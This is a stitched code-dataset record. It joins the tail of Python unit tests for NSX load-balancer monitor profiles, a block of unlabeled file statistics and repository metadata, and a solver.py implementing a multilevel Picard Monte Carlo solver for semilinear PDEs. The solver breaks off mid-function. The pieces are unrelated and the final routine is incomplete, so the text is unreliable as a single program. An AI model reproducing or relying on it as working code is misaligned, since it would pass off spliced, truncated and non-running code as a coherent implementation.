    def test_get_by_name(self):
        # get_by_name is implemented via a list + filter on display_name.
        name = 'd1'
        with mock.patch.object(
            self.policy_api, "list",
            return_value={'results': [{'display_name': name}]}) as api_call:
            obj = self.resourceApi.get_by_name(name, tenant=TEST_TENANT)
            self.assertIsNotNone(obj)
            expected_def = self.obj_def(
                tenant=TEST_TENANT)
            self.assert_called_with_def(api_call, expected_def)

    def test_list(self):
        with mock.patch.object(self.policy_api, "list",
                               return_value={'results': []}) as api_call:
            result = self.resourceApi.list(tenant=TEST_TENANT)
            expected_def = self.obj_def(
                tenant=TEST_TENANT)
            self.assert_called_with_def(api_call, expected_def)
            self.assertEqual([], result)

    def test_update(self):
        obj_id = '111'
        name = 'new name'
        with self.mock_get(obj_id, name), \
                self.mock_create_update() as update_call:
            self.resourceApi.update(obj_id,
                                    name=name,
                                    tenant=TEST_TENANT)
            expected_def = self.obj_def(
                lb_monitor_profile_id=obj_id,
                name=name,
                tenant=TEST_TENANT)
            self.assert_called_with_def(update_call, expected_def)
class TestPolicyLBMonitorProfileHttpsApi(TestPolicyLBMonitorProfileHttpApi):
    """Runs the HTTP monitor-profile test suite against the HTTPS profile."""

    def setUp(self, *args, **kwargs):
        super(TestPolicyLBMonitorProfileHttpsApi, self).setUp()
        self.obj_def = lb_defs.LBHttpsMonitorProfileDef
        self.resourceApi = \
            self.policy_lib.load_balancer.lb_monitor_profile_https
class TestPolicyLBMonitorProfileUdpApi(TestPolicyLBMonitorProfileHttpApi):
    """Runs the HTTP monitor-profile test suite against the UDP profile."""

    def setUp(self, *args, **kwargs):
        super(TestPolicyLBMonitorProfileUdpApi, self).setUp()
        self.obj_def = lb_defs.LBUdpMonitorProfileDef
        self.resourceApi = \
            self.policy_lib.load_balancer.lb_monitor_profile_udp
class TestPolicyLBMonitorProfileIcmpApi(TestPolicyLBMonitorProfileHttpApi):
    """Runs the HTTP monitor-profile test suite against the ICMP profile."""

    def setUp(self, *args, **kwargs):
        super(TestPolicyLBMonitorProfileIcmpApi, self).setUp()
        self.obj_def = lb_defs.LBIcmpMonitorProfileDef
        self.resourceApi = \
            self.policy_lib.load_balancer.lb_monitor_profile_icmp
class TestPolicyLBMonitorProfileTcpApi(TestPolicyLBMonitorProfileHttpApi):
    """Runs the HTTP monitor-profile test suite against the TCP profile."""

    def setUp(self, *args, **kwargs):
        super(TestPolicyLBMonitorProfileTcpApi, self).setUp()
        self.obj_def = lb_defs.LBTcpMonitorProfileDef
        self.resourceApi = \
            self.policy_lib.load_balancer.lb_monitor_profile_tcp
| 42.733233
| 79
| 0.574495
| 8,989
| 85,381
| 5.091668
| 0.043943
| 0.02742
| 0.062226
| 0.041513
| 0.900872
| 0.88112
| 0.873408
| 0.849767
| 0.833097
| 0.805523
| 0
| 0.00797
| 0.343109
| 85,381
| 1,997
| 80
| 42.754632
| 0.80808
| 0.006992
| 0
| 0.827222
| 0
| 0
| 0.059044
| 0.012882
| 0
| 0
| 0
| 0
| 0.098333
| 1
| 0.072778
| false
| 0
| 0.004444
| 0
| 0.085
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
837ab812280828bce0a9d700540813ff60bfb218
| 41,910
|
py
|
Python
|
solver.py
|
philipschw/mlpSolver
|
2f499b8fce0ec368dc2e76c633bab8c425db3982
|
[
"MIT"
] | 1
|
2021-12-21T20:09:59.000Z
|
2021-12-21T20:09:59.000Z
|
solver.py
|
philipschw/mlpSolver
|
2f499b8fce0ec368dc2e76c633bab8c425db3982
|
[
"MIT"
] | null | null | null |
solver.py
|
philipschw/mlpSolver
|
2f499b8fce0ec368dc2e76c633bab8c425db3982
|
[
"MIT"
] | null | null | null |
import logging
import os
import time
import numpy as np
import multiprocessing
try:
from generateSamples import load_mlp_generateSamples
except ModuleNotFoundError:
pass
class MLPSolver(object):
"""The MLP approximation algorithm for semilinear parabolic PDEs."""
def __init__(self, config, mlp):
    """
    Constructor for the MLPSolver class.

    Parameters
    ----------
    config: object
        Configuration of the PDE under consideration; must expose
        ``eqn_config`` and ``eval_config`` attributes.
    mlp: Equation class object
        Class equation object (definition of the terminal function, the
        nonlinearity f, and associated SDE approximation) of the PDE of
        interest.
    """
    self.eqn_config = config.eqn_config
    self.eval_config = config.eval_config
    self.mlp = mlp
    # bool(...) replaces the redundant `True if (...) else False` pattern.
    self.multiprocess = bool(self.eval_config.multiprocess)
def train(self, samples=None):
    """
    Computes realizations of the MLP approximation algorithm.

    Parameters
    ----------
    samples: dict or None
        Dict of the pre-generated samples in advanced mode from
        generateSamples.py, keyed by realization index; None runs the
        non-advanced mode where samples are drawn on the fly.

    Returns
    -------
    np.ndarray
        The training history: one row per realization
        ([theta, sol, elapsed_time, cost]) plus the summary row appended
        by MLPlogging.
    """
    start_train_time = time.time()
    training_history = []
    # begin mlp iterations (different realizations)
    for theta in range(1, self.eval_config.num_realization + 1):
        start_realization_time = time.time()
        # Pre-generated samples are indexed per realization (theta); the
        # original branches only differed in this one argument.
        sample_arg = samples if samples is None else samples[theta]
        if self.eqn_config.gradient_dependent:
            # Gradient-dependent case: solution carries the gradient in
            # extra columns; keep only the value column [:, 0].
            sol = (self.mlp_call_grad(self.mlp.f,
                                      self.mlp.g,
                                      self.mlp.dXsample,
                                      self.mlp.dIsample,
                                      self.mlp.num_iteration,
                                      self.mlp.num_iteration,
                                      self.mlp.x_init,
                                      self.mlp.start_time,
                                      self.multiprocess,
                                      [sample_arg,
                                       (self.mlp.num_iteration,), 0])[:, 0])
        else:
            sol = (self.mlp_call(self.mlp.f,
                                 self.mlp.g,
                                 self.mlp.dXsample,
                                 self.mlp.num_iteration,
                                 self.mlp.num_iteration,
                                 self.mlp.x_init,
                                 self.mlp.start_time,
                                 self.multiprocess,
                                 [sample_arg,
                                  (self.mlp.num_iteration,), 0]))
        elapsed_time = time.time() - start_realization_time
        cost = self.costEval(samples, theta)
        training_history.append([theta, sol, elapsed_time, cost])
        if self.eval_config.verbose:
            # lazy %-args: the message is only formatted if INFO is enabled
            logging.info(
                "Realization: %d, Solution: %s, Elapsed Time: %f, "
                "Cost#RV: %s", theta, sol, elapsed_time, cost)
    overall_elapsed_time = time.time() - start_train_time
    logging.info("Overall Elapsed Time %f", overall_elapsed_time)
    return np.array(self.MLPlogging(training_history, samples))
def errors(self, realization_sol):
    """
    Computes error statistics for a given set of realizations.

    Parameters
    ----------
    realization_sol: np.ndarray
        Contains the solutions of the different realizations.

    Returns
    -------
    np.ndarray of shape (5,)
        [L1 error, relative L1 error, L2 error, relative L2 error,
        empirical standard deviation] of realization_sol with respect to
        the reference solution in self.eval_config (the SD entry stays 0
        when there is only one realization).
    """
    num = self.eval_config.num_realization
    ref_sol = self.eval_config.reference_sol[
        self.eqn_config.dim.index(self.mlp.dim)]
    # Deviation of every realization from the (replicated) reference.
    deviation = (np.stack(realization_sol, axis=0)
                 - np.array([ref_sol, ] * num))
    ref_norm = np.linalg.norm(ref_sol)
    per_realization_norms = np.linalg.norm(deviation, axis=1)
    total_norm = np.linalg.norm(deviation)
    stats = np.zeros(5)
    stats[0] = np.sum(per_realization_norms) / num                  # L1 error
    stats[1] = np.sum(per_realization_norms) / (num * ref_norm)     # rel L1 error
    stats[2] = total_norm / np.sqrt(num)                            # L2 error
    stats[3] = total_norm / (np.sqrt(num) * ref_norm)               # rel L2 error
    if num > 1:
        stats[4] = total_norm / np.sqrt(num - 1)                    # empirical SD
    return stats
def costEval(self, samples, theta):
    """
    Evaluates the cost, that is the number of scalar random variables which
    have to be drawn in one realization of the MLP algorithm.

    Parameters
    ----------
    samples: dict or None
        Dict of the pre-generated samples in advanced mode from
        generateSamples.py; None means cost is not tracked.
    theta: int
        Index of the realization of the current MLP run.

    Returns
    -------
    int or str
        The accumulated cost, or the string "Not evaluated" when no
        pre-generated samples are available.
    """
    if samples is None:
        return "Not evaluated"
    cost = 0
    for key in samples[theta]:
        # key[4] encodes the sample kind; skip kinds this equation
        # does not need.
        if not self.mlp.sampleNeeded[key[4]]:
            continue
        kind = key[4]
        if kind in (2, 3, 4):
            # Iterated-integral samples: the three kinds share the same
            # base cost and differ only in an additive extra term.
            for entry in samples[theta][key]:
                if hasattr(entry, 'shape'):
                    N = entry.shape[0]
                    d = entry.shape[1]
                    n = 5  # here implement logic
                    M = d * (d - 1) // 2
                    if kind == 2:
                        extra = 0            # Ikpw: base cost only
                    elif kind == 3:
                        extra = N * M        # additional cost for Iwik
                    else:
                        extra = N * d + N * M  # additional cost for Imr
                    cost += n * N * d * 2 + extra
        else:
            # Plain samples: every scalar entry counts once.
            cost += len(np.vstack(samples[theta][key]).flatten())
    return cost
def MLPlogging(self, training_history, samples):
    """
    Computes the solution average, the L1 error, the relative L1 error,
    the L2 error, the relative L2 error, the empirical standard deviation,
    and the average elapsed time per realization for a given
    training_history, appends them as a summary row and logs them.

    Parameters
    ----------
    training_history: list
        Contains for each realization a row
        [iteration number, realization values, elapsed time, cost].
    samples: dict or None
        Pre-generated samples (advanced mode) or None.

    Returns
    -------
    list
        training_history with one summary row appended.
    """
    errors = self.errors(np.array(training_history)[:, 1])
    # The summary row is built before the append mutates the list, so the
    # means below only cover the per-realization rows.
    training_history.append([self.mlp.dim,
                             self.mlp.num_iteration,
                             np.mean(np.array(training_history)[:, 1],
                                     axis=0),
                             self.eval_config.reference_sol[
                                 self.eqn_config.dim.index(self.mlp.dim)],
                             errors[0],
                             errors[1],
                             errors[2],
                             errors[3],
                             errors[4],
                             np.mean(np.hstack(
                                 np.array(training_history)[:, 2]))])
    # lazy %-args avoid string formatting when INFO logging is disabled
    logging.info("Reference Solution: %s,", training_history[-1][3])
    logging.info("Solution Average: %s,", training_history[-1][2])
    logging.info("L1 Error: %f", training_history[-1][4])
    logging.info("Relative L1 Error: %f", training_history[-1][5])
    logging.info("L2 Error: %f", training_history[-1][6])
    logging.info("Relative L2 Error: %f", training_history[-1][7])
    logging.info("Empirical Standard Deviation: %f",
                 training_history[-1][8])
    logging.info("Average Elapsed Time per Realization: %f",
                 training_history[-1][9])
    if samples is not None:
        logging.info("Average Sampled 1D RV per Realization: %d",
                     np.mean(np.hstack(np.array(
                         training_history[-(len(samples) + 1):-1])[:, 3])))
    return training_history
def mlp_call_multiprocess(self, f, g, dXsample, n: int, M: int, l: int, x: np.ndarray, t_approx: float, result: np.ndarray, active: bool, advanced: list):
    """
    Auxiliary function for mlp_call routine when multiprocess == True. This
    function computes the Monte Carlo sum involving the difference of the
    nonlinearity f for a single level l.

    Parameters
    ----------
    f : callable(t,x,v)
        Computes the nonlinearity of a semilinear partial differential equation
    g: callable(x)
        Computes the terminal condition of the pde at terminal time T
    dXsample: callable(t_start, t_end, x, dW)
        Solves the SDE for a given approximation method
    n: int
        Iteration step
    M: int
        Basis of number multilevel samples
    l: int
        Iteration step of the MLP approximation in the Monte Carlo
        sum involving the difference of the nonlinearity of a
        MLP approximation at iteration step n
    x: array
        Value of the state space which is approximated by the
        MLP approximation
    t_approx: float
        Time of the time-space point which is approximated by
        the MLP approximation
    result: np.ndarray
        Either None or a shared result array. If result is an array, then
        mlp_call_multiprocess is called by a separate process/core and the
        output is written into it instead of being returned.
    active: boolean
        Checks if this routine is called within a new physical core
    advanced: list
        If advanced[0] == None, then the routine is called in the non-advanced mode, i.e. no pre-generated samples
        are used. Otherwise, advanced[0] is the dict of pre-generated samples, advanced[1] carries the history_index
        (see hist_index and pos_index in load_mlp_generateSamples for more information), and advanced[2] carries the current
        recursive depth "level" (see level load_mlp_generateSamples for more information).

    Returns
    -------
    y: float
        Monte Carlo sum value involving the difference of the nonlinearity f
        of the MLP approximation at time t_approx and state x; only returned
        when active is False (otherwise written into `result`).
    """
    rhs_f = np.zeros(self.eqn_config.dim_system)
    rhs_f_diff = np.zeros(self.eqn_config.dim_system)
    # Case l=0: plain Monte Carlo average of f at the level-0 MLP iterate.
    if(l==0):
        for i in range(M**n):
            # calculate right-hand side f
            if(advanced[0] == None):
                # generate sample data and sample state;
                # R is uniform on [t_approx, total_time]
                r = np.random.uniform(0,1,1)
                R = t_approx + (self.mlp.total_time - t_approx)*r
                dX = dXsample(t_approx, R, x)[0]
            else:
                # advanced mode: reuse the pre-generated uniform draw and
                # Brownian increments stored under this position index
                r = advanced[0][(advanced[2],2,l,i,0)+advanced[1]]
                R = t_approx + (self.mlp.total_time - t_approx)*r
                dW = (load_mlp_generateSamples(samples=advanced[0],
                                               pos_index=(advanced[2],2,l,i),
                                               hist_index=advanced[1],
                                               config=self.mlp.sampleNeeded))
                dX = dXsample(t_approx, R, x, dW)[0]
            # dX[-1] is the SDE value at time R; recurse at level 0
            rhs_f_diff = rhs_f_diff + f(R, dX[-1], self.mlp_call(f, g, dXsample, 0, M, dX[-1], R, False, advanced))
        rhs_f = (self.mlp.total_time - t_approx) * (rhs_f_diff / (M**n))
    # Case l > 0: telescoping difference f(V_l) - f(V_{l-1})
    else:
        for i in range(M**(n-l)):
            # calculate right-hand side f
            if(advanced[0] == None):
                # generate sample data and sample state
                r = np.random.uniform(0,1,1)
                R = t_approx + (self.mlp.total_time - t_approx)*r
                dX = dXsample(t_approx, R, x)[0]
                rhs_f_diff = (rhs_f_diff
                              + f(R, dX[-1], self.mlp_call(f, g, dXsample, l, M, dX[-1], R, False, advanced))
                              - f(R, dX[-1], self.mlp_call(f, g, dXsample, l-1, M, dX[-1], R, False, advanced)))
            else:
                r = advanced[0][(advanced[2],2,l,i,0)+advanced[1]]
                R = t_approx + (self.mlp.total_time - t_approx)*r
                dW = (load_mlp_generateSamples(samples=advanced[0],
                                               pos_index=(advanced[2],2,l,i),
                                               hist_index=advanced[1],
                                               config=self.mlp.sampleNeeded))
                dX = dXsample(t_approx, R, x, dW)[0]
                # NOTE(review): the recursive calls extend the history index
                # with (i, l) resp. (i, -(l-1)); presumably the sign marks the
                # "previous iterate" branch -- confirm against
                # generateSamples.py indexing conventions
                rhs_f_diff = (rhs_f_diff
                              + f(R, dX[-1], self.mlp_call(f, g, dXsample, l, M, dX[-1], R, False, [advanced[0], advanced[1]+(i,l,), advanced[2]+1]))
                              - f(R, dX[-1], self.mlp_call(f, g, dXsample, l-1, M, dX[-1], R, False, [advanced[0], advanced[1]+(i,-(l-1),), advanced[2]+1])))
        rhs_f = (self.mlp.total_time - t_approx) * (rhs_f_diff / (M**(n-l)))
    if(active):
        # running in a child process: copy into the shared result array
        for r in range(self.eqn_config.dim_system):
            result[r] = rhs_f[r].flatten()
    else:
        return rhs_f.flatten()
def mlp_call(self, f, g, dXsample, n: int, M: int, x: np.ndarray, t_approx: float, multiprocess: bool, advanced: list):
    """
    Approximates the solution of a parabolic semilinear partial differential
    equation with gradient-independent nonlinearity (or stochastic fixed
    point equation) at the time-space point (t_approx, x) with the
    full-history recursive multilevel Picard iteration approximation
    algorithm.

    Parameters
    ----------
    f : callable(t,x,v)
        Computes the nonlinearity of a semilinear
        partial differential equation
    g: callable(x)
        Computes the terminal condition of the pde at terminal time T
    dXsample: callable(t_start, t_end, x, dW)
        Solves the SDE for a given approximation method
    n: int
        Iteration step
    M: int
        Basis of number multilevel samples
    x: array
        Value of the state space which is approximated by the
        MLP approximation
    t_approx: float
        Time of the time-space point which is approximated by
        the MLP approximation
    multiprocess: boolean
        Enables or Disables parallel computing version of the MLP
        approximation algorithm
    advanced: list
        If advanced[0] == None, then the routine is called in the non-advanced mode, i.e. no pre-generated samples
        are used. Otherwise, advanced[0] is the dict of pre-generated samples, advanced[1] carries the history_index
        (see hist_index and pos_index in load_mlp_generateSamples for more information), and advanced[2] carries the current
        recursive depth "level" (see level load_mlp_generateSamples for more information).

    Returns
    -------
    y: float
        MLP approximation value at time t_approx and state x
    """
    # Base case of the recursion: the level-0 approximation is zero.
    if(n==0):
        return np.zeros(self.eqn_config.dim_system)
    else:
        # Here we have the multiprocess version of the MLP algorithm.
        if(multiprocess):
            threads = [None] * self.mlp.num_iteration
            results = [None] * self.mlp.num_iteration
            # Spawn up to cpu_count()/2 child processes for the highest
            # levels (most expensive summands) ...
            for l in range(n - 1, n - min(int(multiprocessing.cpu_count()/2), n+1), - 1):
                results[l] = multiprocessing.Array("d",self.eqn_config.dim_system)
                threads[l] = multiprocessing.Process(target=self.mlp_call_multiprocess, args=(f, g, dXsample, n, M, l, x, t_approx, results[l], True, advanced))
                threads[l].start()
            # ... and compute the remaining levels in this process.
            for l in range(n - min(int(multiprocessing.cpu_count()/2), n+1), -1, -1):
                results[l] = self.mlp_call_multiprocess(f, g, dXsample, n, M, l, x, t_approx, None, False, advanced)
            rhs_g = np.zeros(self.eqn_config.dim_system)
            rhs_f = np.zeros(self.eqn_config.dim_system)
            # Compute in the meantime the Monte Carlo sum involving the terminal condition g
            for i in range(M**n):
                # sample state
                if(advanced[0] == None):
                    dX = dXsample(t_approx, self.mlp.total_time, x)[0]
                else:
                    dW = (load_mlp_generateSamples(samples=advanced[0],
                                                   pos_index=(advanced[2],1,0,i),
                                                   hist_index=advanced[1],
                                                   config=self.mlp.sampleNeeded))
                    dX = dXsample(t_approx, self.mlp.total_time, x, dW)[0]
                rhs_g = rhs_g + g(dX[-1])
            rhs_g = rhs_g/(M**n)
            # Gather the results from the threads
            # NOTE(review): results[l] of the spawned processes is a
            # multiprocessing.Array here -- presumably numpy broadcasting
            # over its buffer is intended; confirm the element-wise sum
            for l in range(n - 1, n - min(int(multiprocessing.cpu_count()/2), n+1), - 1):
                threads[l].join()
                rhs_f = rhs_f + results[l]
            for l in range(n - min(int(multiprocessing.cpu_count()/2), n+1), -1, -1):
                rhs_f = rhs_f + results[l]
        # Here starts the single core version of the MLP approximation algorithm
        else:
            rhs_g = np.zeros(self.eqn_config.dim_system)
            rhs_f = np.zeros(self.eqn_config.dim_system)
            rhs_f_diff = np.zeros(self.eqn_config.dim_system)
            # Compute the Monte Carlo sum involving the terminal condition g
            for i in range(M**n):
                # sample state
                if(advanced[0] == None):
                    dX = dXsample(t_approx, self.mlp.total_time, x)[0]
                else:
                    dW = (load_mlp_generateSamples(samples=advanced[0],
                                                   pos_index=(advanced[2],1,0,i),
                                                   hist_index=advanced[1],
                                                   config=self.mlp.sampleNeeded))
                    dX = dXsample(t_approx, self.mlp.total_time, x, dW)[0]
                rhs_g = rhs_g + g(dX[-1])
            rhs_g = rhs_g/(M**n)
            # Compute the Monte Carlo sum involving the difference of the nonlinearity f
            ## Case l=0
            for i in range(M**n):
                # sample state; R is uniform on [t_approx, total_time]
                if(advanced[0] == None):
                    r = np.random.uniform(0,1,1)
                    R = t_approx + (self.mlp.total_time - t_approx)*r
                    dX = dXsample(t_approx, R, x)[0]
                else:
                    r = advanced[0][(advanced[2],2,0,i,0)+advanced[1]]
                    R = t_approx + (self.mlp.total_time - t_approx)*r
                    dW = (load_mlp_generateSamples(samples=advanced[0],
                                                   pos_index=(advanced[2],2,0,i),
                                                   hist_index=advanced[1],
                                                   config=self.mlp.sampleNeeded))
                    dX = dXsample(t_approx, R, x, dW)[0]
                rhs_f_diff = rhs_f_diff + f(R, dX[-1], self.mlp_call(f, g, dXsample, 0, M, dX[-1], R, False, advanced))
            rhs_f = rhs_f + (self.mlp.total_time - t_approx) * (rhs_f_diff / (M**n))
            ## Case l > 0: telescoping differences f(V_l) - f(V_{l-1})
            for l in range(1, n):
                rhs_f_diff = np.zeros(self.eqn_config.dim_system)
                for i in range(M**(n-l)):
                    # sample state
                    if(advanced[0] == None):
                        r = np.random.uniform(0,1,1)
                        R = t_approx + (self.mlp.total_time - t_approx)*r
                        dX = dXsample(t_approx, R, x)[0]
                        rhs_f_diff = (rhs_f_diff
                                      + f(R, dX[-1], self.mlp_call(f, g, dXsample, l, M, dX[-1], R, False, advanced))
                                      - f(R, dX[-1], self.mlp_call(f, g, dXsample, l-1, M, dX[-1], R, False, advanced)))
                    else:
                        r = advanced[0][(advanced[2],2,l,i,0)+advanced[1]]
                        R = t_approx + (self.mlp.total_time - t_approx)*r
                        dW = (load_mlp_generateSamples(samples=advanced[0],
                                                       pos_index=(advanced[2],2,l,i),
                                                       hist_index=advanced[1],
                                                       config=self.mlp.sampleNeeded))
                        dX = dXsample(t_approx, R, x, dW)[0]
                        rhs_f_diff = (rhs_f_diff
                                      + f(R, dX[-1], self.mlp_call(f, g, dXsample, l, M, dX[-1], R, False, [advanced[0], advanced[1]+(i,l,), advanced[2]+1]))
                                      - f(R, dX[-1], self.mlp_call(f, g, dXsample, l-1, M, dX[-1], R, False, [advanced[0], advanced[1]+(i,-(l-1),), advanced[2]+1])))
                rhs_f = rhs_f + (self.mlp.total_time - t_approx) * (rhs_f_diff / (M**(n-l)))
        return rhs_g.flatten() + rhs_f.flatten()
def mlp_call_multiprocess_grad(self, f, g, dXsample, dIsample, n: int, M: int, l: int, x: np.ndarray, t_approx: float, result: np.ndarray, active: bool, advanced: list):
    """
    Auxiliary function for mlp_call_grad routine when multiprocess == True.
    This function computes the Monte Carlo sum involving the difference of
    the gradient-dependent nonlinearity f for a single level l.

    Parameters
    ----------
    f : callable(t,x,v)
        Computes the gradient-dependent nonlinearity of a semilinear
        partial differential equation
    g: callable(x)
        Computes the terminal condition of the pde at terminal time T
    dXsample: callable(t_start, t_end, x, dW)
        Solves the SDE for a given approximation method
    dIsample: callable(t_start, t_end, x, dW, dX)
        Solves the derivative SDE for a given approximation method
    n: int
        Iteration step
    M: int
        Basis of number multilevel samples
    l: int
        Iteration step of the MLP approximation in the Monte Carlo
        sum involving the difference of the nonlinearity of a
        MLP approximation at iteration step n
    x: array
        Value of the state space which is approximated by the
        MLP approximation
    t_approx: float
        Time of the time-space point which is approximated by
        the MLP approximation
    result: np.ndarray
        Either None or a shared result array. If result is an array, then
        this routine is called by a separate process/core and the output is
        written into it instead of being returned.
    active: boolean
        Checks if this routine is called within a new physical core
    advanced: list
        If advanced[0] == None, then the routine is called in the non-advanced mode, i.e. no pre-generated samples
        are used. Otherwise, advanced[0] is the dict of pre-generated samples, advanced[1] carries the history_index
        (see hist_index and pos_index in load_mlp_generateSamples for more information), and advanced[2] carries the current
        recursive depth "level" (see level load_mlp_generateSamples for more information).

    Returns
    -------
    y: float
        Monte Carlo sum value involving the difference of the nonlinearity f
        of the MLP approximation at time t_approx and state x; only returned
        when active is False (otherwise written into `result`).
    """
    rhs_f = np.zeros(shape=(self.eqn_config.dim_system,1))
    rhs_f_diff = np.zeros(shape=(self.eqn_config.dim_system,1))
    # Case l=0: plain Monte Carlo average of f at the level-0 MLP iterate.
    if(l==0):
        for i in range(M**n):
            if(advanced[0] == None):
                # generate sample data and sample state; the evaluation time
                # R is drawn from a power distribution (importance sampling
                # of the time integral)
                r = np.random.power(self.eqn_config.time_dist_exponent,1)
                R = t_approx + (self.mlp.total_time - t_approx)*r
                (dX, dW) = dXsample(t_approx, R, x)
                dI = dIsample(t_approx, R, x, dW, dX)
            else:
                # advanced mode: reuse the pre-generated draws
                r = advanced[0][(advanced[2],2,l,i,0)+advanced[1]]
                R = t_approx + (self.mlp.total_time - t_approx)*r
                dW = (load_mlp_generateSamples(samples=advanced[0],
                                               pos_index=(advanced[2],2,l,i),
                                               hist_index=advanced[1],
                                               config=self.mlp.sampleNeeded))
                dX = dXsample(t_approx, R, x, dW)[0]
                dI = dIsample(t_approx, R, x, dW, dX)
            # r**(1-exponent) is the importance-sampling weight for the
            # power-distributed time R; dI carries the derivative factor
            rhs_f_diff = (rhs_f_diff
                          + (r**(1-self.eqn_config.time_dist_exponent)) * f(R, dX[-1], self.mlp_call_grad(f, g, dXsample, dIsample, 0, M, dX[-1], R, False, advanced)) * dI)
        rhs_f = (self.mlp.total_time - t_approx) * (rhs_f_diff / (self.eqn_config.time_dist_exponent * (M**n)))
    # Case l > 0: telescoping difference f(V_l) - f(V_{l-1})
    else:
        for i in range(M**(n-l)):
            if(advanced[0] == None):
                # generate sample data and sample state
                r = np.random.power(self.eqn_config.time_dist_exponent,1)
                R = t_approx + (self.mlp.total_time - t_approx)*r
                (dX, dW) = dXsample(t_approx, R, x)
                dI = dIsample(t_approx, R, x, dW, dX)
                rhs_f_diff = (rhs_f_diff
                              + ((r**(1-self.eqn_config.time_dist_exponent)) * (f(R, dX[-1], self.mlp_call_grad(f, g, dXsample, dIsample, l, M, dX[-1], R, False, advanced))
                              - f(R, dX[-1], self.mlp_call_grad(f, g, dXsample, dIsample, l-1, M, dX[-1], R, False, advanced)))) * dI)
            else:
                r = advanced[0][(advanced[2],2,l,i,0)+advanced[1]]
                R = t_approx + (self.mlp.total_time - t_approx)*r
                dW = (load_mlp_generateSamples(samples=advanced[0],
                                               pos_index=(advanced[2],2,l,i),
                                               hist_index=advanced[1],
                                               config=self.mlp.sampleNeeded))
                dX = dXsample(t_approx, R, x, dW)[0]
                dI = dIsample(t_approx, R, x, dW, dX)
                rhs_f_diff = (rhs_f_diff
                              + ((r**(1-self.eqn_config.time_dist_exponent))
                              * (f(R, dX[-1], self.mlp_call_grad(f, g, dXsample, dIsample, l, M, dX[-1], R, False, [advanced[0], advanced[1]+(i,l,), advanced[2]+1]))
                              - f(R, dX[-1], self.mlp_call_grad(f, g, dXsample, dIsample, l-1, M, dX[-1], R, False, [advanced[0], advanced[1]+(i,-(l-1),), advanced[2]+1])))) * dI)
        rhs_f = (self.mlp.total_time - t_approx) * (rhs_f_diff / (self.eqn_config.time_dist_exponent * (M**(n-l))))
    if(active):
        # running in a child process: flatten (value, gradient) pairs into
        # the shared 1-D result array, row-major over the system dimension
        for r in range(self.eqn_config.dim_system):
            for d in range(self.mlp.dim + 1):
                result[r*(self.mlp.dim + 1) + d] = rhs_f[r][d]
    else:
        # NOTE(review): reshape uses self.mlp.dim_system while the rest of
        # this class reads self.eqn_config.dim_system -- presumably these
        # agree; confirm on the Equation class
        return rhs_f.reshape((self.mlp.dim_system, self.mlp.dim + 1))
def mlp_call_grad(self, f, g, dXsample, dIsample, n: int, M: int, x: np.ndarray, t_approx: float, multiprocess: bool, advanced: list):
    """
    Approximates the solution of a parabolic semilinear partial differential equation with
    gradient-dependent nonlinearity (or stochastic fixed point equation) at the time-space
    point (t_approx, x) with the full-history recursive multilevel Picard iteration
    approximation algorithm.

    Parameters
    ----------
    f : callable(t, x, v)
        Computes the gradient-dependent nonlinearity of the semilinear PDE.
    g : callable(x)
        Computes the terminal condition of the PDE at terminal time T.
    dXsample : callable(t_start, t_end, x[, dW])
        Solves the SDE for a given approximation method.
    dIsample : callable(t_start, t_end, x, dW, dX)
        Solves the derivative SDE for a given approximation method.
    n : int
        Iteration step.
    M : int
        Basis of the number of multilevel samples.
    x : np.ndarray
        Value of the state space which is approximated by the MLP approximation.
    t_approx : float
        Time of the time-space point which is approximated by the MLP approximation.
    multiprocess : bool
        Enables or disables the parallel-computing version of the MLP algorithm.
    advanced : list
        If advanced[0] is None the routine runs in non-advanced mode, i.e. no
        pre-generated samples are used.  Otherwise advanced[0] is the dict of
        pre-generated samples, advanced[1] carries the history index (see hist_index
        and pos_index in load_mlp_generateSamples) and advanced[2] the current
        recursive depth "level" (see load_mlp_generateSamples).

    Returns
    -------
    np.ndarray
        MLP approximation of shape (dim_system, dim + 1) at time t_approx and state x.
    """
    # Base case of the Picard recursion: the zeroth iterate is identically zero.
    if n == 0:
        return np.zeros(shape=(self.eqn_config.dim_system, self.mlp.dim + 1))
    if multiprocess:
        # Multiprocess version: the level-l Monte Carlo sums involving the difference
        # of the nonlinearity f are computed one process per level, bounded by
        # (roughly) the number of physical cores; the remaining levels run in-process.
        num_workers = min(int(multiprocessing.cpu_count() / 2), n + 1)
        threads = [None] * self.mlp.num_iteration
        results = [None] * self.mlp.num_iteration
        for l in range(n - 1, n - num_workers, -1):
            results[l] = multiprocessing.Array("d", self.eqn_config.dim_system * (self.mlp.dim + 1))
            threads[l] = multiprocessing.Process(target=self.mlp_call_multiprocess_grad, args=(f, g, dXsample, dIsample, n, M, l, x, t_approx, results[l], True, advanced))
            threads[l].start()
        for l in range(n - num_workers, -1, -1):
            # Levels not handed to a worker are computed synchronously and return
            # plain numpy arrays.
            results[l] = self.mlp_call_multiprocess_grad(f, g, dXsample, dIsample, n, M, l, x, t_approx, None, False, advanced)
        rhs_g = np.zeros(shape=(self.eqn_config.dim_system, 1))
        rhs_f = np.zeros(shape=(self.eqn_config.dim_system, 1))
        rhs_f_threads = np.zeros(self.eqn_config.dim_system * (self.mlp.dim + 1))
        # Compute in the meantime the Monte Carlo sum involving the terminal condition g.
        for i in range(M**n):
            if advanced[0] is None:
                (dX, dW) = dXsample(t_approx, self.mlp.total_time, x)
                dI = dIsample(t_approx, self.mlp.total_time, x, dW, dX)
            else:
                dW = load_mlp_generateSamples(samples=advanced[0],
                                              pos_index=(advanced[2], 1, 0, i),
                                              hist_index=advanced[1],
                                              config=self.mlp.sampleNeeded)
                dX = dXsample(t_approx, self.mlp.total_time, x, dW)[0]
                dI = dIsample(t_approx, self.mlp.total_time, x, dW, dX)
            rhs_g = rhs_g + (g(dX[-1]) - g(x)) * dI
        rhs_g = np.insert(np.zeros((self.eqn_config.dim_system, self.mlp.dim)), 0, g(x).flatten(), axis=1) + (rhs_g / (M**n))
        # Gather the worker results.  BUG FIX: the shared ctypes buffer is converted
        # to a numpy array before summing, and the accumulated total is added to
        # rhs_f exactly once after the join loop (the original added the running
        # partial sum on every iteration, double counting earlier levels).
        for l in range(n - 1, n - num_workers, -1):
            threads[l].join()
            rhs_f_threads = rhs_f_threads + np.asarray(results[l][:])
